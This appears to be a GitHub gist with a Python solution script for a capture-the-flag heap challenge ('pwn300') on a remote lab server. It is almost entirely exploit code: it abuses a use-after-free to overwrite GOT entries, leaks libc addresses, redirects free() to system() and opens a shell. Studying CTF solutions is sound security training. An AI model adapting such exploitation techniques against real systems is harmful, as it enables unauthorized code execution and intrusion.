Created
January 24, 2016 04:14
-
-
Save peternguyen93/c6a4121cfe137f3f7a82 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Author : peternguyen | |
| from Pwn import * | |
| import time | |
| import re | |
| # p = Pwn(elf='./pwn300_17eca9c392e17ed1c4b51f7a1913832b') | |
| p = Pwn(host='lab01.matesctf.org',port=1337,elf='./pwn300_17eca9c392e17ed1c4b51f7a1913832b') | |
| def add_enemy(name): | |
| p.read_until('9.Quit.') | |
| p.write('0\n') | |
| length_name = len(name) | |
| p.read_until('Lengh of enemy name:') | |
| p.send(str(length_name) + '\n') | |
| if length_name > 0: | |
| p.read_until('Enemy\'s name:') | |
| p.send(name) | |
| def edit_enemy(_id,name): | |
| p.read_until('9.Quit.') | |
| p.write('2\n') | |
| p.read_until('Id of enemy:') | |
| p.send(str(_id) + '\n') | |
| p.read_until('New Name:') | |
| p.send(name + '\n') | |
| def fight_enemy(_id): | |
| p.read_until('9.Quit.') | |
| p.write('3\n') | |
| p.read_until('Fight enemy:') | |
| p.write(str(_id) + '\n') | |
| def excersize(_time): | |
| p.read_until('9.Quit.') | |
| p.write('5\n') | |
| p.read_until('Excercize:') | |
| p.send(str(_time) + '\n') | |
| time.sleep(_time) | |
| def show_enemy(): | |
| p.read_until('9.Quit.') | |
| p.write('8\n') | |
| leak = p.read_until('Choose an action:') | |
| addr = re.findall(r'Name:(.*)\n',leak) | |
| rand_addr = p.unpack(addr[0]) | |
| # free_addr = p.unpack(addr[1]) | |
| return rand_addr | |
| def exploit(**kargs): | |
| global p # use global var | |
| if kargs.has_key('p'): | |
| if kargs['p'].__class__.__name__ == 'Pwn': # is pwn object | |
| p = kargs['p'] | |
| p.connect() | |
| # raw_input('Debug>') | |
| p.read_until('Enter your name:') | |
| p.send('lolz\n') | |
| add_enemy('lolz123\n') | |
| add_enemy('ff\n') | |
| p.read_until('9.Quit.') | |
| p.write('4\n') # fight all enemy (free all data) | |
| pl1 = 'P'*0x10 | |
| pl1+= p.pA([ | |
| 0, | |
| p.got['rand'], | |
| 0x0804B068 # enemy_count | |
| ]) | |
| pl1 = pl1.ljust(0x48,'A') | |
| pl1+= p.pA([ | |
| 1, | |
| p.got['free'], | |
| 0x0804B068 # enemy_count | |
| ]) | |
| edit_enemy(1,pl1) # edit id 0 (use after free bug) | |
| # recalculate enemy_count = 2 | |
| fight_enemy(1) | |
| excersize(2) | |
| fight_enemy(1) | |
| fight_enemy(1) | |
| excersize(4) | |
| for i in xrange(3): | |
| fight_enemy(1) | |
| # time to leak | |
| rand_addr = show_enemy() | |
| offset,base_addr = p.get_libc_offset(rand_addr,'rand') | |
| system = rand_addr - offset | |
| print 'rand()',hex(rand_addr) | |
| print 'system()',hex(system) | |
| edit_enemy(1,p.pack(system)) # overwrite free() | |
| p.read_until('9.Quit.') | |
| p.write('0\n') | |
| p.read_until('Lengh of enemy name:') | |
| p.write('sh\n') # my shell is comming | |
| p.io() | |
| exploit() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment